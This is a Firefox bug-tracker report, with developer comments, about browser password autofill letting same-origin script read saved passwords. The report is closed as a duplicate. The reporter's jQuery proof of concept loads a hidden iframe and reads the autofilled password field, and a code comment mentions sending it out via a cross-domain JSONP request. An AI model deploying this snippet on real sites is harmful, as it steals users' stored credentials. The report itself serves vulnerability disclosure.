Closed
Bug 693795
Opened 13 years ago
Closed 11 years ago
steal the memorized password
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 534541
People
(Reporter: admin, Unassigned)
Details
The vulnerability can steal the memorized password from the authorization form (common domain on a site with malicious code and on the site with the authorization form (same origin policy) ).
Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7
Windows XP SP3 Pro
//Example in jQuery:
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript">
$(document).ready(function(){
$('#frame').load(function(){
var pass = $('#frame').contents().find('input[name="password"]').val();
alert(pass); // (or send a crossdomain JSONP request)
});
});
</script>
Comment 1•13 years ago
|
||
I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!
Comment 2•13 years ago
|
||
Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.
We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.
Group: core-security
Whiteboard: DUPEME
Dupe for Bug 534541?
Comment 4•11 years ago
|
||
As per comment 3.
This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•